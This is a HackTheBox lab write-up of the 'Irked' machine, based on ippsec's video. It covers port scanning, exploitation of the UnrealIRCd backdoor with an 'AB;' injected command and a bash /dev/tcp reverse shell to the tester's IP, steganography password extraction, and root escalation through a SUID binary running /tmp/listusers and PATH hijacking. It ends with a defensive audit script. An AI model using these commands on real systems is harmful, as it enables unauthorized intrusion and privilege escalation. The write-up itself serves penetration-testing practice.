Irked Hackthebox

Dissection of ippsec's YouTube video HackTheBox - Irked (Fixed). The box covers enumeration of a UnrealIRCd server, steganography and its tools, and a SUID binary that leads to root escalation.


Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series will contain comprehensive write-ups of HackTheBox machines, in an effort to sharpen reporting techniques and help solidify the understanding and methodologies used during penetration testing.

#hailippsec

YouTube Link: https://www.youtube.com/watch?v=OGFTM_qvtVI

Enumeration

Nmap scan

nmap -sC -sV -oA nmap/irked 10.10.10.117

web-server

Check out web-server on port 80

Since the page mentions IRC, move on to a full port scan of the box.

full nmap scan

nmap -vvv -p- 10.10.10.117

return to web-server

check out robots.txt

doesn't exist

check for /~root - some older Apache servers expose user home directories this way (not very common any more)

run gobuster

gobuster -u http://10.10.10.117 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o root.log

return to web-server

check /index.html

We get the main page, which establishes that the site is plain HTML.

try index.aspx

try Default.aspx

return to gobuster

discovered /manual

check out /manual

This gives the default Apache manual page. The copyright is 2014, which suggests the install is old.

nmap full port scan

returned an open port of 8067

Begin to enumerate what this port is with nmap:

nmap -sC -sV -p 8067 10.10.10.117

The port is open and running UnrealIRCd.

connect to port 8067 with ncat

ncat 10.10.10.117 8067

Since the server identifies itself by hostname, edit the hosts file on the local box so that name resolves to the target.

edit host file:

vi /etc/hosts

Check that the hostname works in Firefox and look for any virtual-host routing differences.

IRCd banner information grab

google “RFC IRC”

connect to IRC with ncat and pass the parameters

PASS ippsec
NICK ippsec
USER ippsec PleaseSubscribe AndComment :ippsec

Search the UnrealIRCd changelog for the version string from the banner.

end up finding multiple vulnerabilities

searchsploit UnrealIRC

searchsploit unreal

A Metasploit module for backdoor command execution is identified.

Googling "unrealirc backdoor" leads to https://lwn.net/Articles/392201/, which describes exactly how the backdoor works.

In a nutshell: the backdoor is disguised to look like debug code.

Moving forward without Metasploit, since we now know how the exploit functions.

Set up tcpdump to watch for ICMP coming back from the UnrealIRCd host

tcpdump -i tun0 icmp

Send a ping command through UnrealIRCd:

echo "AB; ping -c 1 10.10.14.3" | ncat 10.10.10.117 8067

After the IRC connection timed out, the ping executed and the ICMP echo request was captured by tcpdump.

Command Execution

Having confirmed that a ping can be triggered via the "AB;" backdoor, move on to a reverse shell.

Set up a listener and send the reverse shell

ncat -lvnp 9001

reverse shell via IRC:

echo "AB; bash -i >& /dev/tcp/10.10.14.3/9001 0>&1" | ncat 10.10.10.117 8067

Wait for the timeout... which didn't result in a shell.

Retry, wrapping the command in bash -c '...' in case /bin/sh is linked to dash, which does not support the /dev/tcp redirection.

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'" | ncat 10.10.10.117 8067

Connection established and a reverse shell obtained.

upgrade shell

python -c 'import pty;pty.spawn("/bin/bash")'
background with ctrl+z
stty raw -echo
fg (enter) (enter)
export TERM=xterm

Enumerate box

print working directory

pwd

![](https://paper-attachments.dropbox.com/s_ECCB58BFC7B8C7FB4F76DF55CC98C0E5842EECCD8EA52152FDA61793F88C4ED5_1556514916306_image.png)

search directory:

check .bash_history file:

cat .bash_history | less

Found a "cd djmardov" entry, so a user djmardov exists.

Navigate to the djmardov home directory.

Check when the kernel was compiled: uname -a

Check for hidden files: find . -ls

Quite a few permission denied errors; narrow to regular files: find . -ls -type f

more permission denied.

discovered user.txt

Check the Documents directory.

We cannot read user.txt because we are not djmardov.

There is a .backup file.

It contains a backup password for some steganography.

Only one image has appeared on this box so far, so download it locally.

curl http://10.10.10.117/irked.jpg -o irked.jpg

use steghide

If it is not installed, install it with:

apt install steghide

The most common usage on CTFs:

steghide extract -sf irked.jpg -p upUPdownDOWNdownLRlrBAbaSSss

This outputs a file containing a password string.

Priv-Esc

SSH Attempt as djmardov

ssh djmardov@10.10.10.117
(password: the string extracted above)

check files

ls -al

Looking for anything obvious.

return to user.txt

find . | grep -i user.txt

Enumeration with LinEnum

Create a local web server to host LinEnum.sh

python -m SimpleHTTPServer

execute

bash LinEnum.sh

The SUID files that stand out were last modified in 2018.

exim4 = mail server
viewuser = interesting prospect

viewuser binary

Check SUID/sticky bit on /usr/bin/viewuser

ls -la /usr/bin/viewuser

Indeed, this binary is SUID root, so it runs with root's privileges.

Test the functionality of viewuser

Copy the binary off the remote box via base64

base64 -w0 /usr/bin/viewuser

(copy to clipboard)

Decode the base64 locally (after pasting it into viewuser.b64):

base64 -d viewuser.b64 > viewuser

This could have been opened in Ghidra or IDA Pro; opting instead to use strace.

strace = lists all system calls

strace ./viewuser

(difficult to read)

ltrace = a similar tracer (for library calls) with more readable output here

ltrace ./viewuser

The system() call runs "who" without a full path, so the command it resolves to depends on the caller's PATH. Afterwards the binary calls setuid(0) and executes /tmp/listusers.

Create /tmp/listusers on the target box:

#!/bin/bash
echo "Sending a shell"
/bin/bash

Make it executable

chmod +x /tmp/listusers

which, when executed, launches a shell.

Return to viewuser, which in turn executes this file and should launch a bash shell as root.

viewuser

Secondary approach: the "who" call

What should have been called is "/usr/bin/who".

Locate who

which who

Change PATH so a writable directory is searched first

export PATH=/dev/shm:$PATH
echo $PATH

Now create a who script in /dev/shm:

vi who
(with the following contents)
#!/bin/bash
echo "Sending a shell"
/bin/bash

Make it executable and run viewuser again

chmod +x who
viewuser

This did not priv-esc, because the "who" call happens before the setuid(0) in the function, so the shell it spawns is not running as root; only the call after setuid(0) is useful.
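As an added audit illustration (not from the video or this write-up), a small script that applies the reasoning from the ltrace section and from the failed "who" attempt to trace output: it flags system() calls whose command is unqualified or lives in a world-writable directory, and records whether each ran before or after setuid(0). The sample ltrace text is constructed for the example, not captured from the box.

```python
import re
from typing import Dict, List

# Constructed sample approximating ltrace output for a SUID binary with the
# behaviour the write-up describes: an unqualified "who" via system(), then
# setuid(0), then a system() call on a world-writable /tmp path. These lines
# are made up for the example, not captured from the real viewuser binary.
SAMPLE_LTRACE = """\
__libc_start_main(0x8048480, 1, 0xbffff6e4, 0x80485b0 <unfinished ...>
system("who" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                             = 0
setuid(0)                                           = 0
system("/tmp/listusers" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                             = 0
+++ exited (status 0) +++
"""

SYSTEM_RE = re.compile(r'^system\("([^"]*)"')
SETUID_RE = re.compile(r'^set(?:re)?uid\((\d+)')

# Directories any local user can write to; a command a privileged process
# runs from here can be replaced by an unprivileged user.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

def audit_ltrace(text: str) -> List[Dict[str, str]]:
    """Walk ltrace output in order and flag risky system() invocations.

    Returns one finding per risky call: the command, why it is risky, and
    whether it ran after the process raised its privileges with setuid(0).
    """
    findings = []
    elevated = False  # becomes True once setuid(0) / setreuid(0, ...) is seen
    for line in text.splitlines():
        line = line.strip()
        m = SETUID_RE.match(line)
        if m and m.group(1) == "0":
            elevated = True
            continue
        m = SYSTEM_RE.match(line)
        if not m:
            continue
        cmd = m.group(1)
        argv0 = cmd.split()[0] if cmd.split() else ""
        reason = None
        if not argv0.startswith("/"):
            reason = "relative command resolved via caller-controlled PATH"
        elif argv0.startswith(WORLD_WRITABLE):
            reason = "absolute path inside a world-writable directory"
        if reason:
            findings.append({"cmd": cmd, "reason": reason,
                             "after_setuid0": "yes" if elevated else "no"})
    return findings
```

A finding with after_setuid0 = "yes" is the one that matters for root; the relative "who" before setuid(0) is still a bug worth fixing (use an absolute path and a fixed PATH) but would only run as the caller.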

Loot & Root


Don't know who ippsec is? Check him out at:

YouTube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
Twitter: https://twitter.com/ippsec

#hailippsec